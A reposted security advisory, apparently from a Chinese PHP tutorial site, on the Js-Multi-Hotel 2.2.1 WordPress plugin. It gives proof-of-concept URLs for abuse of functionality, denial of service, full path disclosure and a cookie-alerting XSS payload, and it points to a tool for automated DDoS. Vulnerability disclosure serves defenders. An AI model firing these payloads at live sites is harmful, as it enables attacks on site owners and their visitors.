网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS漏洞 - 网站安全

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] Hello list! There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress Earlier I wrote about two other vulnerabilities These are Abuse of Functionality, Denia...

Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress.
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for
WordPress. There are much more vulnerabilities in this plugin (including
dangerous holes), so after two advisories I''ll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
----------
Details:
----------
 
Abuse of Functionality (WASC-42):
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
 
DoS (WASC-10):
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
 
Besides conducting DoS attack manually, it''s also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
 
DDoS attacks via other sites execution tool:
http://websecurity.com.ua/davoset/
 
Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I
 
Cross-Site Scripting (WASC-08):
 
http://www.sitedirsec.com/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E
 
About XSS vulnerability in refreshDate.php in parameter roomid there was
written earlier
(http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).
 
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/js-multihotel/includes/functions.php
 
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
 
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
 
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
 
http://site/wp-content/plugins/js-multihotel/includes/widget.php
 
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
 
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
 
I wrote about these vulnerabilities at my site
(http://websecurity.com.ua/7087/).
 
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论